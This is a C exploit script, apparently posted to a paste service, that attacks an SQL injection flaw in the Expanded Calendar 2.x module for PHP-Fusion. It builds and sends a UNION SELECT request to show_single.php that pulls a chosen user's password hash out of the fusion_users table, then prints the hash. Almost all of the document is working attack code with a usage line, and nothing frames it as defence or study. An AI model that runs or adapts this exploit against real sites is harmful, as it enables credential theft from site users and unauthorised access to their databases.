/********************************************************
* Expanded Calendar 2.x (PHP-Fusion module) *
* User pass disclosure exploit *
* Found by Matrix86 of Rbt-4 Crew *
* Site: www.rbt-4.net *
* Mail: info[at]rbt-4[dot]net *
*********************************************************
* Bug found in *
* /infusions/calendar_events_panel/show_single.php *
* Line: *
* 27 *
* Vulnerability type: Sql injection *
* Unpatched! *
********************************************************/
#include <netdb.h>
#include <sys/types.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <stdio.h>
#include <time.h>
#include <errno.h>
#include <regex.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#define PORT 80
#define N_BUF 2048
void stampaE(char *text){
fprintf (stderr, "Error: %s\n", text);
exit (-1);
}
void banner(){
char banner[] = "\n\n*********************************************************\n* Expanded Calendar 2.x (PHP-Fusion module) *\n* User pass disclosure exploit *\n* Found by Matrix86 of Rbt-4 Crew *\n* Site: www.rbt-4.net *\n* Mail: matrix86[at]rbt-4[dot]net *\n*********************************************************\n* Bug found in *\n* /infusions/calendar_events_panel/show_single.php *\n* Line: *\n* 27 *\n* Vulnerability type: Sql injection *\n* Unpatched! *\n*********************************************************";
fprintf(stdout,"%s\n",banner);
sleep(1);
return;
}
void usage(char *name){
fprintf(stderr,"Usage: %s [site] [path] [user_id]\nExample: %s localhost /php-fusion/ 1\n\n",name,name);
exit(-1);
}
int main(int argc,char *argv[]){
struct sockaddr_in client;
int sock,conn,status,i;
struct hostent *data;
int nr,found;
char **alias,*host;
char buf1[INET6_ADDRSTRLEN];
char buffer[1024],get[3000],buf[256];
char pattern[] = "<td colspan='2'><font size='4'><u>(.*?)";
regex_t re;
regmatch_t pmatch[100];
char *ps;
banner();
if(argc < 4) usage(argv[0]);
data = gethostbyname(argv[1]);
if (data == NULL) {
stampaE("Unable to resolve host.");
}
alias = data->h_addr_list;
if (*alias == NULL) {
stampaE("Host not found.");
}
inet_ntop(data->h_addrtype, *alias, buf1, sizeof(buf1));
strcpy(host,buf1);
sock = socket(AF_INET,SOCK_STREAM,0);
if(sock < 0) stampaE("Impossibile inizializzare socket!");
memset((void *)&client, 0, sizeof(client));
client.sin_family = AF_INET;
client.sin_port = htons(PORT);
(void) inet_pton(PF_INET, host, &client.sin_addr);
if(connect(sock, (struct sockaddr *)&client, sizeof(client)) < 0) stampaE("Impossibile connettersi all'indirizzo");
strcpy(get,"GET ");
strcat(get,argv[2]);
strcat(get,"infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,0,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=");
strcat(get,argv[3]);
strcat(get,"/*");
strcat(get," HTTP/1.0\r\n");
strcat(get,"User-Agent: Mozilla/5.0\r\n");
strcat(get,"Host: ");
strcat(get,argv[1]);
strcat(get,"\r\nConnection: Close\r\n\r\n");
get[strlen(get)+1] = 0;
fprintf(stdout,"\nPacket:\n%s",get);
/*Sending sql injection*/
if((send(sock,get,strlen(get),0)) < 0) stampaE("unable send data.");
fprintf(stdout,"Working...");
/*Compile pattern*/
if((status=regcomp(&re,pattern,REG_EXTENDED)) != 0){
regerror(status,&re,buf,120);
exit(2);
}
ps = buffer;
found=0;
/*<table class='tbl' width='100%' id='table1'><tr><td colspan='2'><font size='4'><u>MD5</u>*/
while((nr = read(sock, buffer, sizeof(buffer))) > 0){
buffer[nr] = 0;
if((status = regexec(&re, ps,1,pmatch, 0)) == 0){
found=1;
ps += pmatch[0].rm_so;
ps += 34;
fprintf(stdout,"User password: ");
for(i=0;i < 32;i++) {
fprintf(stdout,"%c",*ps);
ps++;
}
break;
}
}
if(!found) fprintf(stdout,"\nSorry...Bug Fixed!\n");
regfree(&re);
close(sock);
return 0;
}
NoPaste Service
DOWNLOAD